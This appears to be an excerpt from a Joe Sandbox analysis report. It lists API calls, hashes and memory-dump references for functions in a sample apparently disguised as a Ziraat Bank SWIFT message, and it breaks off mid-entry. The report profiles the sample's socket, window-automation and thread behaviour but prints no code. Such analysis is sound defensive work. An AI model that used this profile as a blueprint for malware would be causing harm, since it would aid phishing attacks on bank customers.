nul, xrefs: 000C9600

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: e9cc9fcb9f5a1ea0fb8dede3c6a7427ba38cf2905918942a9101ea7b40337168
Instruction ID: a352dd599977aab795ad084c31ddb93d20c4e2588d1582b54e923264a13a2977
Opcode Fuzzy Hash: e9cc9fcb9f5a1ea0fb8dede3c6a7427ba38cf2905918942a9101ea7b40337168
Instruction Fuzzy Hash: 84216071600605ABDB21AF65DC09F9E7BF8AF45720F204A5DF9A1D72D0D770D941CB10

Function 000C9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 000C9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000C9683
GetStdHandle.KERNEL32(000000F6), ref: 000C9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 000C96CE

Strings

nul, xrefs: 000C96C9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 36619ee1571ada4febceb5e9eec42ac29adb198298ae7359daf0474f93280630
Instruction ID: 210b730801592e2fa8617bc7f98779771d1ae6c780bfc627254b7e1508384353
Opcode Fuzzy Hash: 36619ee1571ada4febceb5e9eec42ac29adb198298ae7359daf0474f93280630
Instruction Fuzzy Hash: DA2150716002059BDB209F699C49F9EB7E8AF55734F200A1DF8A1E72D0EBB0D981CB50

Function 000CDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000CDB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000CDB5E
__swprintf.LIBCMT ref: 000CDB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0011DC00), ref: 000CDBB5

Strings

%lu, xrefs: 000CDB71

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 5276d80a226c8cd1332b79d3011152efb7fe9e7632021518b2b9b5a3cf7bc679
Instruction ID: dd12055bc1a89ad6b050324765eabf59177583664265c860d193135bb90ae0f0
Opcode Fuzzy Hash: 5276d80a226c8cd1332b79d3011152efb7fe9e7632021518b2b9b5a3cf7bc679
Instruction Fuzzy Hash: 73218035A00208AFDB10EFA4DD85EEEBBB8EF49704B014069F549E7252DB71EE41DB61

Function 000BC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BC84A
Part of subcall function 000BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BC85D
Part of subcall function 000BC82D: GetCurrentThreadId.KERNEL32 ref: 000BC864
Part of subcall function 000BC82D: AttachThreadInput.USER32(00000000), ref: 000BC86B

GetFocus.USER32 ref: 000BCA05

Part of subcall function 000BC876: GetParent.USER32(?), ref: 000BC884

GetClassNameW.USER32(?,?,00000100), ref: 000BCA4E
EnumChildWindows.USER32(?,000BCAC4), ref: 000BCA76
__swprintf.LIBCMT ref: 000BCA90

Strings

%s%d, xrefs: 000BCA8A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 506dc6d5c42c0d5c1e4f4c6ce0ea3b019c8852451af789016865abf3a9e6d267
Instruction ID: 961a08fce9707a7a912ea4be4946a7fe67756dcc9d10a34d39d2e4fc89b28764
Opcode Fuzzy Hash: 506dc6d5c42c0d5c1e4f4c6ce0ea3b019c8852451af789016865abf3a9e6d267
Instruction Fuzzy Hash: 3211AC756002096BEB11BFA09C86FEA376DAB44704F048066FA08AA083CBB09945CB71

Function 000EE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 000EE1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 000EE20D
IsDlgButtonChecked.USER32(?,00000001), ref: 000EE248
GetWindowLongW.USER32(?,000000EC), ref: 000EE269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 000EE281

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 3562bc4520bae32ef96addfaf982bf6f837b5739b97301a7dde54a2828d01e6e
Instruction ID: 76f30b00e5065d4550592528bee10e44f81bdb2306bb22d8dc7b58c629481af4
Opcode Fuzzy Hash: 3562bc4520bae32ef96addfaf982bf6f837b5739b97301a7dde54a2828d01e6e
Instruction Fuzzy Hash: C661AF34A002C8AFDB25DF59CC94FEA77FAAB49300F144099F959A72A1C7B1A9C0CB11

Function 000C1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000C1CB4
VariantClear.OLEAUT32(00000013), ref: 000C1D26
VariantClear.OLEAUT32(00000000), ref: 000C1D81
VariantClear.OLEAUT32(?), ref: 000C1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000C1E26

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: b756f3cc22f807f7534b2b7383d67071e81d60dd7e3b9f643185e4a7972ce667
Instruction ID: c03d7e7490fa75119ca5b989568870d15f445f9a9b7d7b40999e0f7554bf7fdf
Opcode Fuzzy Hash: b756f3cc22f807f7534b2b7383d67071e81d60dd7e3b9f643185e4a7972ce667
Instruction Fuzzy Hash: 5C5147B5A00209EFDB14CF58D880EAAB7F8FF4D314B158559E95ADB301E730EA51CBA0

Function 000CA756 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 000CA806
SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA831
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 000CA858
SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA895
SafeArrayUnaccessData.OLEAUT32(?), ref: 000CAAB7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ArraySafe$Data$AccessUnaccess$Vartype
String ID:
API String ID: 1349711609-0
Opcode ID: 9bfcaa4d02643e6089d88388780d323247f7b51e70c60f9e632539f3210f0676
Instruction ID: 32359d827012c060e239a2e14f18d00ed15a9a01a2d25232b3b6427da603f2c4
Opcode Fuzzy Hash: 9bfcaa4d02643e6089d88388780d323247f7b51e70c60f9e632539f3210f0676
Instruction Fuzzy Hash: 3951BD71A002199FDB10CF94D885BEEB7F0FF0A328F20842DE545E7241C7349A85CBA2

Function 000ECCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04176343738f533950559c13c3af0d0e63d8e6adf8f098babd250f1cc60c3a4e
Instruction ID: f248a7a50f73bd6c8d680cfbcf22dd063ff75b1b0e8108d053a4fad5bf519c9c
Opcode Fuzzy Hash: 04176343738f533950559c13c3af0d0e63d8e6adf8f098babd250f1cc60c3a4e
Instruction Fuzzy Hash: 0D412839904284BFE764DF69CC44FA97FA9FB09310F150125F859B72E1C772AD42C650

Function 000D1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000D12B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 000D12DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000D131C

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000D1341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000D1349

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: a95431c5becaf00ab5690f4e8ec37ea1aa9f24ab53b5363791406f4e88af5103
Instruction ID: 4727a2b1875c027a07382ddc6bbcf338aba22a57ea4d5a308aa55a916cbb8b01
Opcode Fuzzy Hash: a95431c5becaf00ab5690f4e8ec37ea1aa9f24ab53b5363791406f4e88af5103
Instruction Fuzzy Hash: 53411F35600605EFDF01EF64C9819ADBBF5FF08314B148099E946AB362DB31EE41DB51

Function 000BB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 000BB369
PostMessageW.USER32(?,00000201,00000001), ref: 000BB413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000BB41B
PostMessageW.USER32(?,00000202,00000000), ref: 000BB429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000BB431

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: cb648fbd6d4aa1adc8862aac7e798c38d6dd604b8272889d7921b38d5d84ac41
Instruction ID: 1ab12f1580632eef55f530a4cff87f64e3b5a5905bc1e4849df5c26e82a480ec
Opcode Fuzzy Hash: cb648fbd6d4aa1adc8862aac7e798c38d6dd604b8272889d7921b38d5d84ac41
Instruction Fuzzy Hash: 2E31BA71900219EBDB14CFA8D94DADE3BB5FB04719F104229F961AB2D1C7F09A54CB90

Function 000BDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 000BDBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000BDBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000BDC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000BDC52
_wcsstr.LIBCMT ref: 000BDC5C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: a817045fd417a9e4d3704d26262936b1290aeec27be40acfc0182cfd5bd82efa
Instruction ID: c54d50c8f187e353ad19707740e62b55b0332336676f6ae5e6f933bc7bebea5b
Opcode Fuzzy Hash: a817045fd417a9e4d3704d26262936b1290aeec27be40acfc0182cfd5bd82efa
Instruction Fuzzy Hash: 5521F971204105BBEB255F79AC49EFFBFA8EF45760F10803AF909CA191FAA1DC41E660

Function 000EDE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

GetWindowLongW.USER32(?,000000F0), ref: 000EDEB0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 000EDED4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000EDEEC
GetSystemMetrics.USER32(00000004), ref: 000EDF14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,000D3A1E,00000000), ref: 000EDF32

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 071c71513ae153c0624c9636f30a1c2f89307f9000fca08e5f4a6ff570e6e165
Instruction ID: 786aa48ec10be496a41f9ac6f35ca94d3936b206915c4507e3780a8b05a668fb
Opcode Fuzzy Hash: 071c71513ae153c0624c9636f30a1c2f89307f9000fca08e5f4a6ff570e6e165
Instruction Fuzzy Hash: 0921B071611252AFCB209F7ADC48B6A37E5EB15324F150336F966EAAF0D77098908B80

Function 000BBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000BBC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BBCC2
__itow.LIBCMT ref: 000BBCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BBD00
__itow.LIBCMT ref: 000BBD11

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 518f76e6da72c5e1bda460ca9f73cff451d3983bba483e6d8ef72f21f682cdfd
Instruction ID: 97568eb477291c9f8e0ba4804309ae055d7991c0c6c44b67b56e68997ee9e17d
Opcode Fuzzy Hash: 518f76e6da72c5e1bda460ca9f73cff451d3983bba483e6d8ef72f21f682cdfd
Instruction Fuzzy Hash: DA21C335600618BFDB20AAA59C46FDE7EA9AF5A710F000424FA45EB182EBF5C94587A1

Function 000C6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 000850E6: _wcsncpy.LIBCMT ref: 000850FA

GetFileAttributesW.KERNEL32(?,?,?,?,000C60C3), ref: 000C6369
GetLastError.KERNEL32(?,?,?,000C60C3), ref: 000C6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000C60C3), ref: 000C6388
_wcsrchr.LIBCMT ref: 000C63AA

Part of subcall function 000C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000C60C3), ref: 000C63E0

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: a23cc21a34a45d445fd906c52d280d2c6f7f745035304cbf70260ea68d36f236
Instruction ID: 203bcf183af5212b22dea68d978e6933560bd28f31c1e4e368574d12ca157e05
Opcode Fuzzy Hash: a23cc21a34a45d445fd906c52d280d2c6f7f745035304cbf70260ea68d36f236
Instruction Fuzzy Hash: D521D8319042555BEF35ABB8AC42FEE23ACAF06360F10046DF145D70C2EBA2DA809A65

Function 000D8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000DA82C: inet_addr.WSOCK32(00000000), ref: 000DA84E

socket.WSOCK32(00000002,00000001,00000006), ref: 000D8BD3
WSAGetLastError.WSOCK32(00000000), ref: 000D8BE2
connect.WSOCK32(00000000,?,00000010), ref: 000D8BFE

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: cf2fe46536ddd901613e9933655244f2b9f1da92569297fe52a3962dccdc46d2
Instruction ID: eb7bbb0934b2fcd90c0a7fe34c61f70585c48c74170393e2b787a330398d1ff5
Opcode Fuzzy Hash: cf2fe46536ddd901613e9933655244f2b9f1da92569297fe52a3962dccdc46d2
Instruction Fuzzy Hash: 792181712002149FDB14AF68DC45FBE77A9EF48714F04845AF95697392CBB4E8418761

Function 000D8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 000D8441
GetForegroundWindow.USER32 ref: 000D8458
GetDC.USER32(00000000), ref: 000D8494
GetPixel.GDI32(00000000,?,00000003), ref: 000D84A0
ReleaseDC.USER32(00000000,00000003), ref: 000D84DB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 3462794206e6e5400e6c57d1b5f94fea569775e193df337ab8be70a6beebeb6d
Instruction ID: ba928a16fc51537368ef245d0d8e23b8be226687aee6f5f9c0d4f20362d3194c
Opcode Fuzzy Hash: 3462794206e6e5400e6c57d1b5f94fea569775e193df337ab8be70a6beebeb6d
Instruction Fuzzy Hash: C8218175A00204AFD700EFA4D889AAEBBF5EF48301F04C479E85997752DF70AC40DB60

Function 0009AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
SelectObject.GDI32(?,00000000), ref: 0009AFF2
BeginPath.GDI32(?), ref: 0009B009
SelectObject.GDI32(?,00000000), ref: 0009B033

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7e9fbd1ed7bd13943a247a69b7a96db6db9d60a2b0ed8d3567f4a20b57c0a0cb
Instruction ID: 3d046bf7c7d1673344963281cfea9a3a5c78c3ef06b68763a72e75d3cd649d3b
Opcode Fuzzy Hash: 7e9fbd1ed7bd13943a247a69b7a96db6db9d60a2b0ed8d3567f4a20b57c0a0cb
Instruction Fuzzy Hash: E02190B4900309BFDB209F95ED487AA7BA8B712365F15422AF524924B0D3F088C1EB90

Function 000A217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 000A21A9
CreateThread.KERNEL32(?,?,000A22DF,00000000,?,?), ref: 000A21ED
